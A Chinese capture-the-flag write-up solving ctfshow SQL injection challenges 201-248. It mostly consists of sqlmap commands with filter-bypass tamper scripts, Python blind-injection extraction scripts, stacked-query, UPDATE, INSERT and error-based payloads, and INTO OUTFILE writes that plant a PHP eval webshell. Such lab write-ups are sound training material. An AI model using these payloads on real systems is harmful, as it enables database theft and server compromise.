ctfshow web入门 sql注入(超详解)201-250
web201
查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
返回逻辑
//对传入的参数进行了过滤
function waf($str){
//代码过于简单,不宜展示
}
需要学会:
使用--user-agent 指定agent
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
使用--referer 绕过referer检查
--referer="ctf.show"
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1OhhOgFI-1629680249997)(http://images2.5666888.xyz//image-20210806161457844.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2o6lYYZO-1629680250003)(http://images2.5666888.xyz//image-20210806161954869.png)]
web202——post方法
使用–data 调整sqlmap的请求方式,主要针对post传参,也可以先burp抓包用-r a.txt来实现sqlmap
--data="id=1"
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hM6PHeqd-1629680250005)(http://images2.5666888.xyz//image-20210806184447194.png)]
web203——put方法
使用--method 调整sqlmap的请求方式
--method="xxx"
强制使用给定的HTTP方法(例如:PUT)
使用--method="PUT"时,需要加上
--headers="Content-Type: text/plain"
否则是按表单提交的,put接收不到
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yLGXx1nl-1629680250006)(http://images2.5666888.xyz//image-20210807203607411.png)]
web204
使用--cookie 提交cookie数据
--cookie="xx=xx"
web205
提示:api调用需要鉴权
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NRwMGFeg-1629680250008)(http://images2.5666888.xyz//image-20210807220923417.png)]
也就是因为这个的原因,所以需要设置--safe-url和--safe-freq,因为抓包发现,每次访问index.php前都会先访问getToken.php才能行
--safe-url 设置在测试目标地址前访问的安全链接
--safe-freq 设置两次注入测试前访问安全链接的次数
web206
sql需要闭合
//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
sqlmap能自动进行闭合操作
python sqlmap.py -u http://.challenge.ctf.show:8080/api/index.php --referer="ctf.show" --data="id=1" --method=PUT --headers="Content-Type: text/plain" --safe-url=http://.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 -D "ctfshow_web" -T ctfshow_flaxc -C flagv --dump
web207——sqlmap中tamper的使用
返回逻辑
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ /', $str);
}
使用tamper脚本修改注入数据:
sqlmap -u "xxx" --tamper '脚本名'
常见的tamper有:
apostrophemask.py 用utf8代替引号
equaltolike.py MSSQL * SQLite中like 代替等号
greatest.py MySQL中绕过过滤’>’ ,用GREATEST替换大于号
space2hash.py 空格替换为#号 随机字符串 以及换行符
space2comment.py 用/**/代替空格
apostrophenullencode.py MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号
halfversionedmorekeywords.py 当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
space2morehash.py MySQL中空格替换为 #号 以及更多随机字符串 换行符
appendnullbyte.p Microsoft Access在有效负荷结束位置加载零字节字符编码
ifnull2ifisnull.py MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤
space2mssqlblank.py mssql空格替换为其它空符号
base64encode.py 用base64编码
space2mssqlhash.py mssql查询中替换空格
modsecurityversioned.py mysql中过滤空格,包含完整的查询版本注释
space2mysqlblank.py mysql中空格替换其它空白符号
between.py MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)
space2mysqldash.py MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
multiplespaces.py 围绕SQL关键字添加多个空格
space2plus.py 用+替换空格
bluecoat.py MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like
nonrecursivereplacement.py 双重查询语句。取代predefined SQL关键字with表示 suitable for替代
space2randomblank.py 代替空格字符(“”)从一个随机的空白字符可选字符的有效集
sp_password.py 追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾
chardoubleencode.py 双url编码(不处理以编码的)
unionalltounion.py 替换UNION ALL SELECT UNION SELECT
charencode.py Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;
randomcase.py Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写
unmagicquotes.py 宽字符绕过 GPC addslashes
randomcomments.py 用/**/分割sql关键字
charunicodeencode.py ASP,ASP.NET中字符串 unicode 编码
securesphere.py 追加特制的字符串
versionedmorekeywords.py MySQL >= 5.1.13注释绕过
halfversionedmorekeywords.py MySQL < 5.1中关键字前加注释
这里使用space2comment这个脚本,用/**/代替空格
python sqlmap.py -u "http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/index.php" --referer="ctf.show" --data="id=1" --cookie="PHPSESSID=vv1lcq36ru3v3hnu9qsk4mllub" --method="PUT" -headers="Content-Type:text/plain" --safe-url="http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=space2comment.py --dump
web208
//对传入的参数进行了过滤
// $id = str_replace('select', '', $id);
function waf($str){
return preg_match('/ /', $str);
}
过滤关键词,可以大小写绕过,用到randomcase.py,同时space2comment.py也得用上--tamper=randomcase.py,space2comment.py
web209
这里是利用的/**/来代替的空格,但是此题被waf挡住了,我们换%0a,%09都可以--tamper="tamper/space2comment.py"
然后针对=的过滤,需要添加以下内容:
elif payload[i] == '=':
retVal += chr(0x0d)+'like'+chr(0x0d)
continue
web210-212
返回逻辑
//对查询字符进行解密
function decode($id){
return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
return preg_match('/ |\*/', $str);
}
对你输入的id有解密处理,所以需要自行加密,同时对返回值过滤空格*号,需要用%09来代替即可
--tamper=web212即可
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9JZm10jc-1629680250009)(http://images2.5666888.xyz//image-20210812221751652.png)]
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
payload = space2comment(payload)
retVal = ""
if payload:
retVal = base64.b64encode(payload[::-1].encode('utf-8'))
retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
return retVal
def space2comment(payload):
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += chr(0x0a)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == "*":
retVal += chr(0x31)
continue
elif payload[i] == "=":
retVal += chr(0x0a)+'like'+chr(0x0a)
continue
elif payload[i] == " " and not doublequote and not quote:
retVal += chr(0x0a)
continue
retVal += payload[i]
return retVal
web213——os-shell
练习使用--os-shell 一键getshell
//对查询字符进行解密
function decode($id){
return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
return preg_match('/ |\*/', $str);
}
原理大致是:
用into outfile函数将一个可以用来上传的php文件写到网站的根目录下,之后再上传一个文件,这个文件可以用来执行系统命令,并且将结果返回出来
os-shell的使用条件
(1)网站必须是root权限
(2)攻击者需要知道网站的绝对路径
(3)GPC为off,php主动转义的功能关闭
web214
有两个post注入点:ip&debug
# -*- coding: utf-8 -*-
# @Author : Yn8rt
# @Time : 2021/8/13 20:01
# @Function:
import requests
url = "http://42ef38fd-35c5-4cb5-ae0a-658cbd6d58e2.challenge.ctf.show:8080/api/"
flag = ""
i = 0
while True:
i += 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# 查库名
payload = "database()"
# 查表名字
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查列名字-id.flag
# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
# 查数据
# payload = "select flaga from ctfshow_flagx"
data = {
'ip': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1)",
'debug':'0'
}
try:
r = requests.post(url, data=data, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
flag += chr(head)
else:
break
print(flag)
web215
闭合单引号即可:
data = { 'ip': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1) and '1'='1", 'debug':'0' }
web216
查询语句
where id = from_base64($id);
需要闭合
data = { 'ip': f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1", 'debug':'0' }
最终格式
where id = from_base64(1) or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1);
web217
关于benchmark函数,他会造成一个简单的时间延迟,同时网上还流传利用benchmark函数进行ddos攻击,是想让数据库超负荷,也算是比较新鲜的一个函数,比较好理解
MySQL中benchmark_MYSQL中BENCHMARK函数的利用
关键语句
data = { 'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(100000,md5(1)),1", 'debug':'0' }
web218
MySQL时间盲注五种延时方法
笛卡尔积(多表联合查询)(因为连接表是一个很耗时的操作) AxB=A和B中每个元素的组合所组成的集合,就是连接表 SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; select * from table_name A, table_name B select * from table_name A, table_name B,table_name C select count(*) from table_name A, table_name B,table_name C 表可以是同一张表
重点在很耗时,所以说可以利用这一点特性,将多表联合查询放在原来sleep的位置,就可以同样有睡眠的效果
脚本
import requests
import sys
import time
url="http://6b39c9d3-3c24-432b-abfd-735534f0e5cf.challenge.ctf.show:8080/api/"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{_}" #最后跑flag时去掉"_"
flag=""
for i in range(100):
for j in letter:
#payload="1) or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
#payload="1) or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc') like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0) -- +".format(flag+j)
payload="1) or if((select group_concat(flagaac) from ctfshow_flagxc) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
data={
'ip':payload,
'debug':0
}
#print(res)
try:
res = requests.post(url=url,data=data,timeout=0.15).text
except:
flag+=j
print(flag)
break
if "}" == j:
sys.exit()
time.sleep(0.2) #遍历letter中一个字符就停止0.2s
time.sleep(0.2) #正确匹配到一个字符就停止1s
web219-web220
import requests
import sys
import time
url="/api/index.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{}" #最后跑flag时去掉"_"
flag="ctfshow{45835205-bd93-40ff-9d71-"
for i in range(14,100):
for j in letter:
#payload="1) or if((table_name from information_schema.tables where table_schema=database() limit 0,1) like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1)-- -".format(flag+j)
#payload="1) or if((select column_name from information_schema.columns where table_name='ctfshow_flagxcac') like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),0) -- +".format(flag+j)
payload="1) or if((select flagaabcc from ctfshow_flagxcac) like '{}%',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)-- -".format(flag+j)
data={
'ip':payload,
'debug':0
}
#print(payload)
try:
res = requests.post(url=url,data=data,timeout=0.15).text
except:
flag+=j
print(flag)
break
if "}" == j:
sys.exit()
#print(res)
time.sleep(0.3) #遍历letter中一个字符就停止1s
time.sleep(0.3) #正确匹配到一个字符就停止1s
web221——Limit注入
Mysql 注入之 limit 注入
查询语句
//分页查询
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;
返回逻辑
//TODO:很安全,不需要过滤
//拿到数据库名字就算你赢
按照链接的做法:
extractvalue(目标xml文档,xml路径):对XML文档进行查询的函数
?page=1&limit=7 procedure analyse(extractvalue(1,concat(666,database(),666)),1)
updatexml(目标xml文档,xml路径,更新的内容):更新xml文档的函数
?page=1&limit=7 procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1)
web222——group by 注入
查询语句
//分页查询 $sql = select * from ctfshow_user group by $username;
floor()报错注入
CTF-sql-group by报错注入
y4的脚本
"""Author:Y4tacker"""import requestsurl = "http://6119f221-08cd-4363-88d4-1809bd590024.chall.ctf.show/api/"result = ""i = 0while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # 查数据库 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 查列名字 # payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1" # 查数据---不能一次查完越到后面越不准确 payload = "select flagaabc from ctfshow_flaga" # flag{b747hfb7-P8e8- params = { 'u': f"concat((if (ascii(substr(({payload}),{i},1))>{mid}, sleep(0.05), 2)), 1);" } try: r = requests.get(url, params=params, timeout=1) tail = mid except Exception as e: head = mid + 1 if head != 32: result += chr(head) else: break print(result)
此处用sleep代替了floor
web223
查询语句
//分页查询 $sql = select * from ctfshow_user group by $username;
返回逻辑
//TODO:很安全,不需要过滤//用户名不能是数字
利用原理
?u=if('a'='a',username,'a')?u=if('a'='b',username,'a')
脚本
import requests
def generateNum(num):
res = 'true'
if num == 1:
return res
else:
for i in range(num - 1):
res += "+true"
return res
url = "http://ff765902-0dec-4688-8cd2-1a4cc429d30a.chall.ctf.show/api/"
i = 0
res = ""
while 1:
head = 32
tail = 127
i = i + 1
while head < tail:
mid = (head + tail) >> 1
# 查数据库-ctfshow_flagas
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段-flagasabc
# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
# 查flag
payload = "select flagasabc from ctfshow_flagas"
params = {
"u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')"
}
r = requests.get(url, params=params)
# print(r.json()['data'])
if "userAUTO" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
res += chr(head)
else:
break
print(res)
主要通过生成数字的函数,就原有的脚本进行了数字编码
web224
/robots.txt:
User-agent: *
Disallow: /pwdreset.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-44pjIwkR-1629680250010)(http://images2.5666888.xyz//image-20210816173211309.png)]
登陆后是文件上传,经过测试任何文件都无法上传
你没见过的注入经过这篇文章介绍,应该是需要修改文件的comments是我用的群里面的payload.bin文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Rl1kr6u3-1629680250011)(http://images2.5666888.xyz//image-20210816183907366.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJXZso93-1629680250012)(http://images2.5666888.xyz//image-20210816184141602.png)]
这里的16进制为一句话木马,很有可能是原来的语句中,有一个解析comment的环节,正好到了这个环节也就中招了,括号被闭合,木马成功写入
getshell后读取upload.php
error_reporting(0);
if ($_FILES["file"]["error"] > 0)
{
die("Return Code: " . $_FILES["file"]["error"] . "
");
}
if($_FILES["file"]["size"]>10*1024){
die("文件过大: " .($_FILES["file"]["size"] / 1024) . " Kb
");
}
if (file_exists("upload/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " already exists. ";
}
else
{
$filename = md5(md5(rand(1,10000))).".zip";
$filetype = (new finfo)->file($_FILES['file']['tmp_name']);
if(preg_match("/image|png|bmap|jpg|jpeg|application|text|audio|video/i",$filetype)){
die("file type error");
}
$filepath = "upload/".$filename;
$sql = "INSERT INTO file(filename,filepath,filetype) VALUES ('".$filename."','".$filepath."','".$filetype."');";
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $filename);
$con = mysqli_connect("localhost","root","root","ctf");
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
if (mysqli_multi_query($con, $sql)) {
header("location:filelist.php");
} else {
echo "Error: " . $sql . "
" . mysqli_error($con);
}
mysqli_close($con);
}
?>
印证猜想,其中关键在filetype的解析环节导致了comment里面的内容被读取并写入,这在给出的文章中也有提到,相信仔细看的人都会发现:是因为finfo的缘故
web225——Handler、预处理
必看链接
查询语句
//分页查询
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
返回逻辑
//师傅说过滤的越多越好
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
die(json_encode($ret));
}
方法一——Handler
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
/api/?username=';show tables;-- -
/api/?username=';handler `ctfshow_flagasa` open;handler `ctfshow_flagasa` read first;-- -
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
方法二——预处理
标准格式
PREPARE name from '[my sql sequece]'; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL 语句
我的格式
PREPARE yn8rt from concat('selec','t * from ctfshow_flagasa');
EXECUTE yn8rt;
DROP PREPARE yn8rt;
concat(char(115,101,108,101,99,116)也可以代替select
web226——预处理配合16进制
返回逻辑
//师傅说过滤的越多越好
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
die(json_encode($ret));
}
来个在线转换地址
PREPARE yn8rt from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE yn8rt;DROP PREPARE yn8rt;
直接拿到flag,但是不知道为什么select database()却得不到数据库名字
web227——information_schema.routines查看存储过程和函数
返回逻辑
//师傅说过滤的越多越好 if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){ die(json_encode($ret)); }
考点:
MySQL——查看存储过程和函数
mysql存储过程和函数总结
表中没有写入flag,而是把flag写在了储存过程和函数中在 MySQL 中,存储过程和函数的信息存储在 information_schema 数据库下的 Routines 表中查询语法:SELECT * FROM information_schema.Routines WHERE ROUTINE_NAME = ’ sp_name ’ ;其中,ROUTINE_NAME 字段中存储的是存储过程和函数的名称; sp_name 参数表示存储过程或函数的名称。
依然利用预处理进行解题:
PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;
EXECUTE yn8rt;
DROP PREPARE yn8rt;
记得闭合前面的单引号,在得知函数名为getFlag后继续精确操作:
information_schema 数据库中的 Routines 表中,存储了所有存储过程和函数的定义。使用 SELECT 语句查询 Routines 表中的存储过程和函数的定义时,一定要使用 ROUTNE_NAME 字段指定存储过程或函数的名称。否则,将查询出所有的存储过程或函数的定义。如果存储过程和存储函数名称相同,则需要要同时指定 ROUTINE_TYPE 字段表明查询的是哪种类型的存储程序。
?username=user1';PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e657320776865726520726f7574696e655f6e616d65203d2027676574466c616727;EXECUTE yn8rt;
16进制解码:select * from information_schema.routines where routine_name = 'getFlag'
原来这里还可以藏flag
web228、229、230
与web226一样,还没开始今天的任务就结束了,爽啊!
web231——update
查询语句
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
这个题目很是巧妙,首先这是一条更新数据的语句,而并非查询语句,所以最终的目的是更新,而不是查询,所以结果是不会直接显现出来的,而是需要我们利用子查询,将结果更新到可见的表中,然后直接观测即可
payload:
//查库名、闭合引号
password=1',username=database()#&username=1
返回初始页面会发现用户名全都变成了ctfshow_web,也就是说更新成功了,紧接着我们就可以利用这个来找flag了
//查表明
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=1
//banlist,ctfshow_user,flaga
//查列名
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
//id,flagas,info
//查flag
password=1',username=(select flagas from ctfshow_web.flaga) where 1=1#&username=1
web232
查询语句
//分页查询
$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";
同web231
只不过多了md5处理参数
payload:
//查库名、闭合引号
password=1'),username=database()#&username=1
//查flag
password=1'),username=(select flagass from ctfshow_web.flagaa) where 1=1#&username=1
需要闭合md5函数的右括号即可
web233
查询语句
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
盲注
# -*- coding: utf-8 -*-# @Author : Yn8rt# @Time : 2021/8/18 15:32# @Function:import requestsimport timeurl = 'http://2fbf0abc-142a-43e2-abe1-c5bdebbd0823.challenge.ctf.show:8080/api/'flag = ""i = 0while 1: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # 查库名 payload = "database()" # 查数据 payload = "select flagass233 from flag233333" data = { 'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),0)#", 'password': 'y' } try: r = requests.post(url=url, data=data, timeout=2.1) tail = mid except Exception as e: head = mid + 1 time.sleep(1)# 每生成一个新的mid来比较时睡1s if head != 32: flag += chr(head) else: break time.sleep(1)# flag每被赋值一次时睡1s print(flag)
通过这个题目发现一个问题,启的docker可以被睡死,然后睡醒了才能复活
web234——反斜杠\转义引号
查询语句
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
返回逻辑
//无过滤
因为单引号被过滤了,当存在单引号,和没有单引号的时候返回值是不一样的,所以需要用反斜杠转义来逃逸,然后注入点改为username,因为前面的where已经被当做字符串了失去了原来的作用,这样才会保证set成功
payload:
password=1\&username=,username=(select database())#
password=1\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
//flag23a
password=1\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#
//id,flagass23s3,info
password=1\&username=,username=(select flagass23s3 from flag23a)#
web235、236——Bypass information_schema与无列名注入
概述MySQL统计信息
CTF|mysql之无列名注入
这么个意思呢。
就是利用
innodb_table_stats代替information_schema
mysql默认存储引擎innoDB携带的表:
mysql.innodb_table_stats
mysql.innodb_index_stats
两表均有database_name和table_name字段
查询语句
//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
返回逻辑
//过滤 or '
payload:
password=1\&username=,username=(select database())#
password=1\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#
//banlist,ctfshow_user,flag23a1
非常一定要看:Bypass information_schema与无列名注入
接下来需要无列名注入
payload:
password=1\&username=,username=(select group_concat(`2`) from(select 1,2,3 union select * from flag23a1)a)#
web237——INSERT注入
查询语句
//插入数据 $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
闭合!
username=yn8rt',database());#&password=1username=yn8rt',(select group_concat(table_name) from information_schema.tables where table_schema=database()));#&password=1username=yn8rt',(select group_concat(column_name) from information_schema.columns where table_name='flag'));#&password=1username=yn8rt',(select group_concat(flagass23s3) from flag));#&password=1
web238——INSERT注入
用()代替空格
username=yn8rt',(select(database())));#&password=1
username=yn8rt',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1
username=yn8rt',(select(group_concat(table_column))from(information_schema.columns)where(table_name='flagb')));#&password=1
username=yn8rt',(select(group_concat(flag))from(flagb)));#&password=1
web239——INSERT注入
information表被过滤了,按照之前的做法用mysql.innodb_table_stats
首先查表
username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1
然后盲猜:
username=yn8rt',(select(group_concat(flag))from(flagbb);#
web240
Hint: 表名共9位,flag开头,后五位由a/b组成,如flagabaab,全小写
查询语句
//插入数据
$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
返回逻辑
//过滤空格 or sys mysql
python脚本
import requests
kk="ab"
url1="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/insert.php"
url2="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/?page=1&limit=100"
for i in kk:
for j in kk:
for m in kk:
for n in kk:
for c in kk:
flag="flag"+i+j+m+n+c
print(flag)
data={
'username':"yn8rt',(select(group_concat(flag))from({})));#".format(flag),
'password':1
}
res=requests.post(url=url1,data=data).text
r=requests.get(url=url2).text
print(r)
if "ctfshow{" in r:
print(res)
exit()
web241——DELETE注入
sql语句
//删除记录
$sql = "delete from ctfshow_user where id = {$id}";
python脚本
# -*- coding: utf-8 -*-
# @Author : Yn8rt
# @Time : 2021/8/20 13:04
# @Function:
import requests
import time
url = 'http://060c1957-6988-495b-82a7-bd24f6611427.challenge.ctf.show:8080/api/delete.php'
flag = ''
i = 4
while 1:
i += 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# 查库名
# payload = 'database()'
# 查表名
# payload = '(select group_concat(table_name) from information_schema.tables where table_schema=database())'
# 查列名
# payload = "(select group_concat(column_name) from information_schema.columns where table_name='flag')"
# 查flag
payload = '(select flag from flag)'
data = {
'id':f"if(ascii(substr({payload},{i},1))>{mid},sleep(0.1),0)#"
}
try:
r = requests.post(url=url,data=data,timeout=2.1)
tail = mid
except Exception as e:
head = mid + 1
time.sleep(1)
if head != 32:
flag += chr(head)
else:
break
time.sleep(1)
print(flag)
web242——file文件读写
sql语句
//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";
利用info outfile的扩展参数来做题
SELECT ... INTO OUTFILE 'file_name'
[CHARACTER SET charset_name]
[export_options]
export_options:
[{FIELDS | COLUMNS}
[TERMINATED BY 'string']//分隔符
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
“OPTION”参数为可选参数选项,其可能的取值有:
`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。
`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。
`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。
`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。
`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。
`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。
可以写马的参数有:
FIELDS TERMINATED BY、 LINES STARTING BY、 LINES TERMINATED BY
在url/api/dump.php下写马
马在url/dump/1.php
filename=1.php' LINES STARTING BY "";#
命令行到根目录输入
find / -name "f*" | xargs grep "ctfshow"
web243
sql语句
//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";
返回逻辑
//过滤了php
在上一题目的payload中是需要php字段的,这里给取消掉了,也不知道phtml好不好用,但是本地重要考点在于.user.ini:auto_append_file=1.png或者auto_prepend_file=1.png
再熟悉一遍上一题的参数:
FIELDS TERMINATED BY:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。
LINES STARTING BY '字符串':设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。
LINES TERMINATED BY '字符串':设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。
payload:
先上ini:
filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e706e670a;#
注意16进制是为了0a(换行)发挥作用,而starting by “;”,是想让每行数据的开头字符都是分号,是为了让前面的那个select * from ctfshow_user查出来的东西与后面的做个了断
再上png:
filename=1.png' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#
连接时候注意是/dump/index.php
web244、245——报错注入
sql语句
//备份表
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
报错注入的两种形式:
extractvalue(目标xml文档,xml路径):对XML文档进行查询的函数
updatexml(目标xml文档,xml路径,更新的内容):更新xml文档的函数
其都是针对xml路径进行的注入
payload:
updatexml:
?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)+--+
?id=1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,32),0x7e),1)+--+
?id=1' or updatexml(1,concat(0x7e,(select left(flag,32) from ctfshow_flag),0x7e),1)+--+
?id=1' or updatexml(1,concat(0x7e,(select right(flag,32) from ctfshow_flag),0x7e),1)+--+
extractvalue:
?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))+--+
?id=1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),20,30),0x7e))+--+
web246——floor报错注入
**floor报错注入:**主要利用主键的重复来实现报错
?id=1' union select 1,count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -
?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1), 0x7e,floor(rand(0)*2))b from information_schema.tables group by b -- -
?id=1' union select 1,count(*),concat(0x7e,(select flag2 from ctfshow_flags),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -
web247——双查询错误注入、报错注入
floor():向下取整
ceil():向上取整
round():四舍五入
floor替换成其他取整函数即可
?id=1' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa ), 0x7e,round(rand(0)*2))b from information_schema.tables group by b -- -
web248——UDF注入
udf:用户自定义的函数
